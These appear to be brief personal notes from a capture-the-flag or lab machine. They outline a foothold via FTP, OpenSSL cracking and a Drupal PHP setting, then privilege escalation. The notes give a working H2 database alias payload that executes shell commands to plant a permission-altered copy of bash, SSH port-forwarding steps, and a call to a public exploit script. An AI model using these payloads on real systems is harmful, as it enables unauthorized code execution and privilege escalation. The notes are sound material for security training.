foothold, ez, ftp (hidden file) -> openssl crack -> drupal php setting -> rce


privesc 1

https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : "";  }$$;
CALL SHELLEXEC('cp /bin/bash /home/daniel/bash')
CALL SHELLEXEC('chmod 7777 /home/daniel/bash')



local port forwarding

ssh daniel@10.129.95.193 -L 8082:localhost:8082

can just go to 127.0.0.1:8082 on kali



dynamic port forwarding

ssh daniel@XXX.XXX.XXX.XXX -D 8081

proxychains.conf is 8081

proxychains curl 127.0.0.1:8082

to go and view on firefox, go set proxy to 8081, then navigate to http://IP:8082/login.jsp?jsessionid=865902cea48ef5dc128249c017ba9bf2, do not use localhost or 127.0.0.1 (different from local portfwd)








privesc 2

https://www.exploit-db.com/exploits/45506

python3 45506.py --host 127.0.0.1:8082
